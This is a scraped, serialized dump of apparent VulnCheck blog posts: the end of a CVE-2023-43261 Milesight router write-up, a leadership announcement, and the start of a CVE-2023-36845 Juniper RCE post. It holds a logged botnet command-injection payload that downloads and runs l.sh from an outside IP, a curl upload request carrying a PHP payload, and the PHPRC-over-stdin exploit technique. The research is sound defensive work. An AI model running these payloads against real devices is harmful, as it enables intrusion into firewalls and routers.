{\"id\":51,\"execute\":1,\"core\":\"yruo_firewall_security\",\"function\":\"set\",\"values\":[{\"base\":\"yruo_firewall_security\",\"index\":1,\"value\":{\"http_remote\":1,\"https_remote\":1,\"telnet_remote\":1,\"ssh_remote\":1,\"ftp_local\":1,\"ftp_remote\":1,\"url\":[\"http:\u002F\u002F\"],\"keyword\":[\"\"]}}]}\n",[886,86779,86780],{"__ignoreMap":219},[1373,86781,86782,86785,86787,86789,86791,86793,86795,86797,86800,86802,86805,86808,86810,86812,86814,86816,86818,86820,86822,86824,86826,86828,86830,86832,86834,86836,86838,86840,86842,86844,86846,86848,86851,86853,86855,86857,86859,86861,86863,86865,86868,86870,86872,86874,86876,86878,86880,86882,86885,86887,86889,86891,86893,86895,86897,86899,86902,86904,86906,86908,86910,86912,86914,86916,86918,86920,86924,86926,86928,86930,86932,86934,86937,86939,86941,86943,86945,86947,86950,86952,86954,86956,86958,86960,86963,86965,86967,86969,86971,86973,86976,86978,86980,86982,86984,86986,86989,86991,86993,86995,86997,86999,87001,87003,87005,87007,87010,87012,87014,87016,87019,87021,87023,87025],{"class":1375,"line":1376},[1373,86783,86784],{"class":5467},"2023-10-04",[1373,86786,52192],{"class":5467},[1373,86788,4606],{"class":4640},[1373,86790,37766],{"class":5467},[1373,86792,4606],{"class":4640},[1373,86794,36914],{"class":5467},[1373,86796,76315],{"class":1383},[1373,86798,86799],{"class":5467},"200.73",[1373,86801,59],{"class":28571},[1373,86803,86804],{"class":5467},"18.40",[1373,86806,86807],{"class":28571},":admin",[1373,86809,15050],{"class":1383},[1373,86811,86215],{"class":4640},[1373,86813,9149],{"class":1383},[1373,86815,183],{"class":9152},[1373,86817,26412],{"class":9155},[1373,86819,183],{"class":9152},[1373,86821,4606],{"class":1383},[1373,86823,65524],{"class":5467},[1373,86825,5437],{"class":1383},[1373,86827,183],{"class":9152},[1373,86829,51343],{"class":9155},[1373,86831,183],{"class":9152},[1373,86833,4606],{"class":1383},[1373,86835,467],{"class":5467},[1373,86837,5437],{"class":1383},[1373,86839,18
3],{"class":9152},[1373,86841,86250],{"class":9155},[1373,86843,183],{"class":9152},[1373,86845,4606],{"class":1383},[1373,86847,183],{"class":9173},[1373,86849,86850],{"class":9176},"yruo_firewall_security",[1373,86852,183],{"class":9173},[1373,86854,5437],{"class":1383},[1373,86856,183],{"class":9152},[1373,86858,8560],{"class":9155},[1373,86860,183],{"class":9152},[1373,86862,4606],{"class":1383},[1373,86864,183],{"class":9173},[1373,86866,86867],{"class":9176},"set",[1373,86869,183],{"class":9173},[1373,86871,5437],{"class":1383},[1373,86873,183],{"class":9152},[1373,86875,86284],{"class":9155},[1373,86877,183],{"class":9152},[1373,86879,86289],{"class":1383},[1373,86881,183],{"class":9152},[1373,86883,86884],{"class":9165},"base",[1373,86886,183],{"class":9152},[1373,86888,4606],{"class":1383},[1373,86890,183],{"class":9173},[1373,86892,86850],{"class":9176},[1373,86894,183],{"class":9173},[1373,86896,5437],{"class":1383},[1373,86898,183],{"class":9152},[1373,86900,86901],{"class":9165},"index",[1373,86903,183],{"class":9152},[1373,86905,4606],{"class":1383},[1373,86907,467],{"class":5467},[1373,86909,5437],{"class":1383},[1373,86911,183],{"class":9152},[1373,86913,85021],{"class":9165},[1373,86915,183],{"class":9152},[1373,86917,8304],{"class":1383},[1373,86919,183],{"class":9152},[1373,86921,86923],{"class":86922},"sTC9v","http_remote",[1373,86925,183],{"class":9152},[1373,86927,4606],{"class":1383},[1373,86929,467],{"class":5467},[1373,86931,5437],{"class":1383},[1373,86933,183],{"class":9152},[1373,86935,86936],{"class":86922},"https_remote",[1373,86938,183],{"class":9152},[1373,86940,4606],{"class":1383},[1373,86942,467],{"class":5467},[1373,86944,5437],{"class":1383},[1373,86946,183],{"class":9152},[1373,86948,86949],{"class":86922},"telnet_remote",[1373,86951,183],{"class":9152},[1373,86953,4606],{"class":1383},[1373,86955,467],{"class":5467},[1373,86957,5437],{"class":1383},[1373,86959,183],{"class":9152},[1373,86961,86962],{"class":86922},"ssh_remote",
[1373,86964,183],{"class":9152},[1373,86966,4606],{"class":1383},[1373,86968,467],{"class":5467},[1373,86970,5437],{"class":1383},[1373,86972,183],{"class":9152},[1373,86974,86975],{"class":86922},"ftp_local",[1373,86977,183],{"class":9152},[1373,86979,4606],{"class":1383},[1373,86981,467],{"class":5467},[1373,86983,5437],{"class":1383},[1373,86985,183],{"class":9152},[1373,86987,86988],{"class":86922},"ftp_remote",[1373,86990,183],{"class":9152},[1373,86992,4606],{"class":1383},[1373,86994,467],{"class":5467},[1373,86996,5437],{"class":1383},[1373,86998,183],{"class":9152},[1373,87000,7585],{"class":86922},[1373,87002,183],{"class":9152},[1373,87004,81544],{"class":1383},[1373,87006,183],{"class":9173},[1373,87008,87009],{"class":9176},"http:\u002F\u002F",[1373,87011,183],{"class":9173},[1373,87013,27625],{"class":1383},[1373,87015,183],{"class":9152},[1373,87017,87018],{"class":86922},"keyword",[1373,87020,183],{"class":9152},[1373,87022,81544],{"class":1383},[1373,87024,7083],{"class":9173},[1373,87026,87027],{"class":1383},"]}}]}\n",[18,87029,87030,87031,87033],{},"Of course, it’s difficult to determine exactly what is an attacker and what is a bad admin. Maybe the real administrator ",[1131,87032,4563],{}," log in using a VPN in Chile. We suspect not, but anything is possible, which is why we leave this at “probably exploited in the wild” but not at scale.",[1920,87035,1903],{"id":1902},[18,87037,87038],{},"Our interest in CVE-2023-43261 centered around the idea that there were a lot of vulnerable routers that might provide attackers with access to ICS networks. We learned that, in reality, CVE-2023-43261 was patched long ago. The CVE description is not only inadequate but also inaccurate, and the vast majority of internet-facing systems are patched. 
Nonetheless, we do see some evidence of exploitation in the wild.",[18,87040,87041],{},"If you have a Milesight Industrial Cellular Router, it’s probably wise to assume all the credentials on the system have been compromised and to simply generate new ones, and ensure no interfaces are reachable via the internet.",[1920,87043,87045],{"id":87044},"appendix","Appendix",[18,87047,87048],{},"Somewhat related to all of the above, but slightly beside the point, is that these routers end up logging a lot of information from unauthenticated users. One request most of the routers ended up logging looks like this:",[1354,87050,87052],{"className":31740,"code":87051,"language":2186,"meta":219,"style":219},"2023-10-04 16:59:49 [103.83.144.161:Not Loggined in]:data: command=2&ipAddr=&dnsAddr=$(cd+\u002Ftmp;wget+http:\u002F\u002F194.180.48[.]100\u002Fl.sh;curl+-O+http:\u002F\u002F194.180.48[.]100\u002Fl.sh;sh+l.sh)&interface=0&netType=0&scrFilter=&dstFilter=&fi\n",[886,87053,87054],{"__ignoreMap":219},[1373,87055,87056,87058,87061,87064,87067,87070,87073,87075,87077,87080,87082,87084,87087,87089,87092,87094,87097,87099,87102,87104,87107,87109,87112,87115,87118,87120,87122,87124,87127,87129,87131,87133,87136,87138,87140,87143,87145,87147],{"class":1375,"line":1376},[1373,87057,86784],{"class":2206},[1373,87059,87060],{"class":1391}," 16:59:49",[1373,87062,87063],{"class":4640}," [103.83.144.161:Not ",[1373,87065,87066],{"class":1391},"Loggined",[1373,87068,87069],{"class":1391}," in]:data:",[1373,87071,87072],{"class":1391}," 
command=",[1373,87074,353],{"class":5467},[1373,87076,7218],{"class":1383},[1373,87078,87079],{"class":4640},"ipAddr",[1373,87081,5417],{"class":1397},[1373,87083,7218],{"class":1383},[1373,87085,87086],{"class":4640},"dnsAddr",[1373,87088,5417],{"class":1397},[1373,87090,87091],{"class":1383},"$(",[1373,87093,21460],{"class":1379},[1373,87095,87096],{"class":1391},"+\u002Ftmp",[1373,87098,39663],{"class":1383},[1373,87100,87101],{"class":2206},"wget+http:\u002F\u002F194.180.48[.]100\u002Fl.sh",[1373,87103,39663],{"class":1383},[1373,87105,87106],{"class":2206},"curl+-O+http:\u002F\u002F194.180.48[.]100\u002Fl.sh",[1373,87108,39663],{"class":1383},[1373,87110,87111],{"class":2206},"sh+l.sh",[1373,87113,87114],{"class":1383},")&",[1373,87116,87117],{"class":4640},"interface",[1373,87119,5417],{"class":1397},[1373,87121,445],{"class":1391},[1373,87123,7218],{"class":1383},[1373,87125,87126],{"class":4640},"netType",[1373,87128,5417],{"class":1397},[1373,87130,445],{"class":1391},[1373,87132,7218],{"class":1383},[1373,87134,87135],{"class":4640},"scrFilter",[1373,87137,5417],{"class":1397},[1373,87139,7218],{"class":1383},[1373,87141,87142],{"class":4640},"dstFilter",[1373,87144,5417],{"class":1397},[1373,87146,7218],{"class":1383},[1373,87148,87149],{"class":4636},"fi\n",[18,87151,87152,87153,87158,87159,87164,87165,87170],{},"This appears to be the ",[47,87154,87157],{"href":87155,"rel":87156},"https:\u002F\u002Fwww.radware.com\u002Fsecurity\u002Fthreat-advisories-and-attack-reports\u002Fdark-iot-botnet\u002F",[51],"Dark.IoT"," botnet throwing ",[47,87160,87163],{"href":87161,"rel":87162},"https:\u002F\u002Fresearch.nccgroup.com\u002F2021\u002F07\u002F26\u002Ftechnical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380\u002F",[51],"CVE-2021-36380",". 
We’ve put the MIPS version of the downloaded binary on ",[47,87166,87169],{"href":87167,"rel":87168},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fba0481b0a57c4e94b59b6a3f20ba1c41a8329c88cf01c578ac734f3638ecfa59\u002Fdetection",[51],"VirusTotal",". The binary has a few additional exploits it uses for spreading.",[2901,87172,87173],{},"html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .s4fT8, html code.shiki .s4fT8{--shiki-light:#90A4AE;--shiki-light-font-style:inherit;--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic;--shiki-sepia:#F44747;--shiki-sepia-font-style:inherit}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .s_MOj, html code.shiki 
",{"title":219,"searchDepth":220,"depth":220,"links":87175},[87176],{"id":86356,"depth":220,"text":86357},"2023-10-13","VulnCheck was excited to breach ICS networks when CVE-2023-43261 was first disclosed. However, there is more to this than the CVE description would lead you to believe. 
Follow VulnCheck’s journey from CVE description to exploitation in the wild",{"slug":87180},"real-world-cve-2023-43261","\u002Fblog\u002Freal-world-cve-2023-43261",{"title":83541,"description":87178},"blog\u002Freal-world-cve-2023-43261",[242,23275],"9fSq1I-Qm_9xlXlDWUO2toqi5A9LLU8Dkdj5wglQ0jg",{"id":87187,"title":87188,"articles":7,"authors":87189,"body":87191,"date":87303,"description":87304,"extension":234,"image":7,"link":7,"meta":87305,"navigation":237,"path":87307,"seo":87308,"series":7,"stem":87309,"subtype":7,"tags":7,"__hash__":87310},"blog\u002Fblog\u002Fjoining-vulncheck.md","Growth Starts with People",[87190],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":87192,"toc":87300},[87193,87196,87199,87202,87209,87212,87220,87223,87227,87234,87240,87247,87254,87259,87262,87268,87271,87280,87285,87288,87291,87294,87297],[18,87194,87195],{},"Joining a new company - it’s always an adjustment in many respects. And joining a new startup? That also requires some shifting of your mindset. And for many reasons, depending on how early or even late-stage the venture is.",[18,87197,87198],{},"However, one thing that one of my mentors always said to me was, ‘You have to be vested in the problem you're trying to solve. 
Remember why you’re there.’",[18,87200,87201],{},"The older I get, the more important this is, and it’s not just believing in a mission statement either - it’s about applying the innovation, skill, domain expertise and the critical thinking that you believe in to challenge the status quo, and grow a company into something great.",[18,87203,87204,87205,87208],{},"I’m happy to announce that I have joined ",[47,87206,2709],{"href":78319,"rel":87207},[51]," as Chief Marketing Officer, to help bring visibility and validation to our brand, to support customer growth and to help deliver exceptional security research insights to the market in many forms.",[18,87210,87211],{},"What we’re building at VulnCheck is unlike any other company in how we identify potentially exploitable vulnerabilities with speed and precision that is simply not possible anywhere else. The energy, the collaboration and the quick path to innovating are palpable and we are going to take the cybersecurity world by storm!",[18,87213,87214,87215,87219],{},"What’s exciting is that today we announced new members of our leadership team, all of whom have incredible experience in building successful cybersecurity ventures. You can read the announcement here. And you can check out our snazzy new ",[47,87216,87218],{"href":87217},"\u002Fcompany\u002Fabout","leadership team"," section here, compliments of Kevin Olson!",[18,87221,87222],{},"Because we couldn’t fit it all into the press release, each new team member has supplied a reason for joining VulnCheck. 
And I’ll just say it - with this experienced, domain-savvy team of all-stars, we're well-positioned for growth, scale and, most importantly, helping the cybersecurity ecosystem get better and faster in defending businesses worldwide!",[61,87224,87226],{"id":87225},"our-teams-perspectives","Our Team’s Perspectives",[43656,87228,87231],{"author":87229,"position":87230},"Ralph Logan","Chief Strategy Officer",[18,87232,87233],{},"“Having driven product strategy and development in the security product market for decades, I leapt at the opportunity to come aboard after learning about VulnCheck’s market differentiating offerings. Their key differentiators in Exploit Intelligence and Initial Access Intelligence to better assist enterprises’ hunt and defense efforts are unparalleled and they are leaps and bounds beyond others’ efforts.”",[43656,87235,87237],{"author":10391,"position":87236},"Chief Technology Officer",[18,87238,87239],{},"“Before joining VulnCheck, I had the opportunity to demo the product, and I was blown away by the quantity and quality of the intelligence. I'd seen nothing like it before. I was already enthusiastic about the product when Anthony and I began discussing how I might fit into the company. Our discussions resulted in a complementary new product called \"Initial Access Intelligence\" which contains closed-source intelligence generated by VulnCheck researchers. On the strength of VulnCheck's open source intelligence, with the additional unique insights from our closed-source intelligence, I knew VulnCheck was destined to become a force in the market.”",[43656,87241,87244],{"author":87242,"position":87243},"Thomas Bain","Chief Marketing Officer",[18,87245,87246],{},"“I’m excited about the opportunity with VulnCheck because we’re doing something that no one else is doing, and it is a true game-changer for the entire cybersecurity universe. 
VulnCheck is rewriting the playbook on vulnerability and exploit intelligence, and is helping customers increase the velocity and vulnerability validity to detect threats that matter.”",[43656,87248,87251],{"author":87249,"position":87250},"David Munson","Vice President, Engineering",[18,87252,87253],{},"“In my career in security, valuable intelligence was always very short-lived and palimpsest. Value was only revealed with context that you had to build or join with other data sets. VulnCheck brings context to intelligence and helps the fight against adversaries. This is the data I wanted when I was on the defense. I’m excited to provide a force multiplier to defenders.”",[18,87255,87256],{},[295,87257,87258],{},"What is Different About VulnCheck?",[18,87260,87261],{},"I’ll come back to the problem we solve, with some context on how we’re solving it, and why I believe this company is going to be the stickiest provider in the cyber threat intelligence ecosystem:",[18,87263,87264,87267],{},[295,87265,87266],{},"The Problem we are Solving","\nAs I said above - it’s essential to have a deep belief in the problem you are solving in order to invest in everything it takes to build a sustainable business. The attack landscape, and the ecosystem through which organizations are being targeted, have evolved with the pace of digital business.",[18,87269,87270],{},"In other words, attackers are looking for faster returns and easier yet lucrative outcomes. Whether it’s disruption of critical services or theft - it’s become essential to modernize how you manage vulnerabilities before they are exploited. 
The emergence of OSS has really changed the economics and the dynamics of how attackers pluck out vulnerabilities to exploit.",[18,87272,87273,87274,87279],{},"In fact, at ",[47,87275,87278],{"href":87276,"rel":87277},"https:\u002F\u002Fwww.mandiant.com\u002Fevents\u002Frsac",[51],"Mandiant’s keynote presentation at RSAC in April",", they disclosed that 32% of breaches tracked in 2022 were the result of exploits - that is the first time that the top root source of breaches has NOT been phishing. This means that things are changing and VulnCheck is the right company at the right time to help solve this exact challenge.",[18,87281,87282],{},[295,87283,87284],{},"Exploits, Not Just Vulnerabilities",[18,87286,87287],{},"Vulnerability management has been a cybersecurity discipline for many years at this point. Not only is it a large market in terms of its market size, but it’s a critical component of any enterprise SOC or DevSecOps team. But what happens when an attacker randomly selects one of millions of known vulnerabilities and decides to exploit it, and that vulnerability is persistent in 90% of software deployed in the enterprise? You have a problem.",[18,87289,87290],{},"Less than 3% of vulnerabilities are ACTUALLY exploited. Why? It’s an expensive endeavor to shop, pay for and subsequently build exploits for zero-days. It’s a lot cheaper to build exploits for known vulnerabilities. 
That’s why Log4Shell was such a wake-up call that forced national legislation, as well as a number of industry-related regulations.",[18,87292,87293],{},"This is where VulnCheck is leveraging the expertise of some of the foremost security researchers in the world to build a real-time solution that does not require the build-out of scripts against the CISA KEV, featuring 5X more exploits vs. any other solution, and is building out a way for cybersecurity firms, government agencies and enterprise organizations to automatically enrich detections with the richest data set available.",[18,87295,87296],{},"Again, the excitement in the air at VulnCheck is real, and our growing list of customers is enabling us to build a truly different company that is maniacally focused on changing how organizations are managing vulnerabilities!",[87298,87299],"contact-cta",{},{"title":219,"searchDepth":220,"depth":220,"links":87301},[87302],{"id":87225,"depth":220,"text":87226},"2023-10-12","VulnCheck is excited to announce four new leadership team additions!",{"slug":87306},"joining-vulncheck","\u002Fblog\u002Fjoining-vulncheck",{"title":87188,"description":87304},"blog\u002Fjoining-vulncheck","ked_57MpNPcrz1jmCfNZoyXieqehEelHMn6cXPtKhgc",{"id":87312,"title":35931,"articles":87313,"authors":87368,"body":87370,"date":87317,"description":89198,"extension":234,"image":7,"link":7,"meta":89199,"navigation":237,"path":89201,"seo":89202,"series":7,"stem":89203,"subtype":7,"tags":89204,"__hash__":89205},"blog\u002Fblog\u002Fjuniper-cve-2023-36845.md",[87314,87318,87321,87326,87329,87332,87335,87338,87341,87346,87349,87352,87357,87361,87365],{"title":87315,"source":14373,"link":87316,"date":87317},"Thousands of Juniper devices vulnerable to unauthenticated RCE flaw","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fthousands-of-juniper-devices-vulnerable-to-unauthenticated-rce-flaw\u002F","2023-09-18",{"title":87319,"source":3481,"link":87320,"date":87317},"Thousands of 
Juniper Junos firewalls still open to hijacks, exploit code available to all","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F09\u002F18\u002Fjuniper_firewalls_rce\u002F",{"title":87322,"source":87323,"link":87324,"date":87325},"Microsoft AI Researchers Accidentally Exposed Tens of Terabytes of Sensitive Data","Metacurity Newsletter","https:\u002F\u002Fmetacurity.substack.com\u002Fp\u002Fmicrosoft-ai-researchers-accidentally","2023-09-19",{"title":87327,"source":14390,"link":87328,"date":87325},"12,000 JUNIPER SRX FIREWALLS AND EX SWITCHES VULNERABLE TO CVE-2023-36845","https:\u002F\u002Fsecurityaffairs.com\u002F151037\u002Fhacking\u002F12000-juniper-devices-cve-2023-36845.html",{"title":87330,"source":14378,"link":87331,"date":87325},"Thousands of Juniper Appliances Vulnerable to New Exploit","https:\u002F\u002Fwww.securityweek.com\u002Fthousands-of-juniper-appliances-vulnerable-to-new-exploit\u002F",{"title":87333,"source":37282,"link":87334,"date":87325},"Snap! -- Halloween Rules, Artificial Neurons, Artificial Womb, Helpdesk Hackers","https:\u002F\u002Fcommunity.spiceworks.com\u002Ftopic\u002F2494581-snap-halloween-rules-artificial-neurons-artificial-womb-helpdesk-hackers?from_forum=6339",{"title":87336,"source":39566,"link":87337,"date":87325},"Cyberespionage and state-directed cybercrime. BlackCat's recent activity. Water commission under attack. Notes on cyber phases of a hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F178",{"title":87339,"source":14382,"link":87340,"date":87325},"Nearly 12,000 Juniper Firewalls Found Vulnerable to Recently Disclosed RCE Vulnerability","https:\u002F\u002Fthehackernews.com\u002F2023\u002F09\u002Fover-12000-juniper-firewalls-found.html",{"title":87342,"source":87343,"link":87344,"date":87345},"Cyber Security Today, Sept. 
20, 2023 – A new online card-skimming campaign, new WinServer backdoors and more","ITWorld Canada's Cyber Security Today podcast","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-sept-20-2023-a-new-online-card-skimming-campaign-new-winserver-backdoors-and-more\u002F547222","2023-09-20",{"title":87347,"source":11233,"link":87348,"date":87345},"New RCE flaw impacts thousands of Juniper firewall devices","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fnew-rce-flaw-impacts-thousands-of-juniper-firewall-devices",{"title":87350,"source":60960,"link":87351,"date":87345},"Thousands of Juniper firewalls are open to serious attack","https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsecurity\u002Fthousands-of-juniper-firewalls-are-open-to-serious-attack",{"title":87353,"source":87354,"link":87355,"date":87356},"NCURSES & BAD THINGS, LVFS IS NOT A BACKDOOR, PHYSICAL PROXIMITY, & OH, FORTINET! – PSW #799","SC Media in Paul's Security Weekly podcast","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002F11997-ncurses-bad-things-lvfs-is-not-a-backdoor-physical-proximity-oh-fortinet-psw-799","2023-09-21",{"title":87358,"source":14390,"link":87359,"date":87360},"SECURITY AFFAIRS NEWSLETTER ROUND 438 BY PIERLUIGI PAGANINI – INTERNATIONAL EDITION","https:\u002F\u002Fsecurityaffairs.com\u002F151293\u002Fbreaking-news\u002Fsecurity-affairs-newsletter-round-438-by-pierluigi-paganini-international-edition.html","2023-09-24",{"title":87362,"source":14390,"link":87363,"date":87364},"CISA ADDS FIVE VULNERABILITIES IN JUNIPER DEVICES TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG","https:\u002F\u002Fsecurityaffairs.com\u002F154128\u002Fsecurity\u002Fcisa-juniper-flaws-known-exploited-vulnerabilities-catalog.html","2023-11-13",{"title":87366,"source":14373,"link":87367,"date":82185},"Juniper warns of critical RCE bug in its firewalls and 
switches","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fjuniper-warns-of-critical-rce-bug-in-its-firewalls-and-switches\u002F#google_vignette",[87369],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":87371,"toc":89185},[87372,87398,87400,87416,87418,87437,87457,87491,87494,87498,87519,87535,87552,87891,87897,87901,87909,87914,87925,87930,87954,88409,88412,88416,88423,88429,88441,88447,88453,88458,88461,88764,88767,88771,88774,88777,88779,88783,88791,88794,88798,88804,88827,88830,88909,88913,88927,89182],[18,87373,87374,87379,87380,87385,87386,87391,87392,87397],{},[47,87375,87378],{"href":87376,"rel":87377},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-36845",[51],"CVE-2023-36845"," is a PHP environment variable manipulation vulnerability affecting Juniper ",[47,87381,87384],{"href":87382,"rel":87383},"https:\u002F\u002Fwww.juniper.net\u002Fus\u002Fen\u002Fproducts\u002Fsecurity\u002Fsrx-series.html",[51],"SRX"," firewalls and ",[47,87387,87390],{"href":87388,"rel":87389},"https:\u002F\u002Fwww.juniper.net\u002Fus\u002Fen\u002Fproducts\u002Fswitches\u002Fex-series.html",[51],"EX"," switches. ",[47,87393,87396],{"href":87394,"rel":87395},"https:\u002F\u002Fsupportportal.juniper.net\u002Fs\u002Farticle\u002F2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US",[51],"Juniper scored"," the vulnerability as a medium severity issue. 
However, in this blog, we’ll show you how this vulnerability alone can achieve remote, unauthenticated code execution without even touching the disk.",[61,87399,20],{"id":3520},[22,87401,87402,87405,87408],{},[25,87403,87404],{},"VulnCheck developed an exploit for CVE-2023-36845 that allows an unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system.",[25,87406,87407],{},"Approximately 80% of affected internet-facing firewalls remain unpatched.",[25,87409,87410,87411,87415],{},"VulnCheck released a ",[47,87412,87414],{"href":83426,"rel":87413},[51],"vulnerability scanner"," to identify firewalls vulnerable to CVE-2023-36845.",[61,87417,11273],{"id":11272},[18,87419,87420,87421,87425,87426,87430,87431,87436],{},"CVE-2023-36845 (see appendix for CVE clarification) was first described by ",[47,87422,14823],{"href":87423,"rel":87424},"https:\u002F\u002Flabs.watchtowr.com\u002Fcve-2023-36844-and-friends-rce-in-juniper-firewalls\u002F",[51]," in a multi-step file upload ",[47,87427,22852],{"href":87428,"rel":87429},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Ffcb027407d46",[51]," chain. In order to replicate their work, we purchased an ancient ",[47,87432,87435],{"href":87433,"rel":87434},"https:\u002F\u002Fwww.juniper.net\u002Fdocumentation\u002Fproduct\u002Fus\u002Fen\u002Fsrx210\u002F",[51],"SRX210"," from eBay. We quickly learned that the watchTowr exploit didn’t work on our device.",[18,87438,87439,87440,87445,87446,87449,87450,87453,87454,87456],{},"The first part of the watchTowr exploit chain uses ",[47,87441,87444],{"href":87442,"rel":87443},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-36846",[51],"CVE-2023-36846"," to invoke a ",[886,87447,87448],{},"do_fileUpload"," function in the J-Web interface. This results in writing arbitrary files to ",[886,87451,87452],{},"\u002Fvar\u002Ftmp",". 
Unfortunately, our old SRX210’s J-Web doesn’t have the ",[886,87455,87448],{}," functionality, so the exploit failed:",[1354,87458,87460],{"className":31740,"code":87459,"language":2186,"meta":219,"style":219},"$ curl http:\u002F\u002F10.12.72.1\u002Fwebauth_operation.php -d 'rs=do_upload&rsargs[]=[{\"fileName\": \"test.php\", \"fileData\": \",PD9waHAgDQpwaHBpbmZvKCk7DQo\u002FPg==\", \"csize\": 22}]'\n-:function not callable\n",[886,87461,87462,87481],{"__ignoreMap":219},[1373,87463,87464,87466,87468,87471,87474,87476,87479],{"class":1375,"line":1376},[1373,87465,4644],{"class":2206},[1373,87467,2222],{"class":1391},[1373,87469,87470],{"class":1391}," http:\u002F\u002F10.12.72.1\u002Fwebauth_operation.php",[1373,87472,87473],{"class":2209}," -d",[1373,87475,4713],{"class":1387},[1373,87477,87478],{"class":1391},"rs=do_upload&rsargs[]=[{\"fileName\": \"test.php\", \"fileData\": \",PD9waHAgDQpwaHBpbmZvKCk7DQo\u002FPg==\", \"csize\": 22}]",[1373,87480,76063],{"class":1387},[1373,87482,87483,87486,87488],{"class":1375,"line":220},[1373,87484,87485],{"class":2206},"-:function",[1373,87487,78483],{"class":1391},[1373,87489,87490],{"class":1391}," callable\n",[18,87492,87493],{},"Juniper targets are a delicious meal, though, so we weren’t going to be put off so easily. We began hunting for a secondary file upload mechanism or a new path to code execution. 
We did find a secondary file upload mechanism (see the appendix), but what we really want to share is a new path to code execution that doesn’t require a file upload at all.",[61,87495,87497],{"id":87496},"a-file-that-isnt","A File That Isn’t",[18,87499,87500,87501,87506,87507,87512,87513,87518],{},"watchTowr’s attack achieves code execution by uploading two files, setting the ",[47,87502,87505],{"href":87503,"rel":87504},"https:\u002F\u002Fwww.php.net\u002Fmanual\u002Fen\u002Fconfiguration.file.php",[51],"PHPRC"," environment variable to one of those files, and then using the php.ini ",[47,87508,87511],{"href":87509,"rel":87510},"https:\u002F\u002Fwww.php.net\u002Fmanual\u002Fen\u002Fini.core.php#ini.auto-prepend-file",[51],"auto_prepend_file","\nsetting to force every php page to load the second file. It’s a clever attack, but if you can’t upload a file, then what can you do? Use ",[47,87514,87517],{"href":87515,"rel":87516},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FStandard_streams#Standard_input_(stdin)",[51],"stdin",", of course.",[18,87520,87521,87522,87527,87528,87531,87532,87534],{},"The Juniper firewalls use the ",[47,87523,87526],{"href":87524,"rel":87525},"https:\u002F\u002Fwww.embedthis.com\u002Fappweb\u002F",[51],"Appweb"," web server. When Appweb invokes a CGI script, it passes a variety of environment variables and arguments so that the script can access the user’s HTTP request. The body of the HTTP request is passed via stdin. The affected firewalls run FreeBSD, and every FreeBSD process can access their stdin by opening ",[886,87529,87530],{},"\u002Fdev\u002Ffd\u002F0",". By sending an HTTP request, we’re able to introduce a “file”, ",[886,87533,87530],{},", to the system.",[18,87536,87537,87538,87540,87541,87544,87545,87547,87548,87551],{},"Using that trick, we can set the PHPRC environment variable to ",[886,87539,87530],{}," and include the desired ",[886,87542,87543],{},"php.ini"," in our HTTP request. 
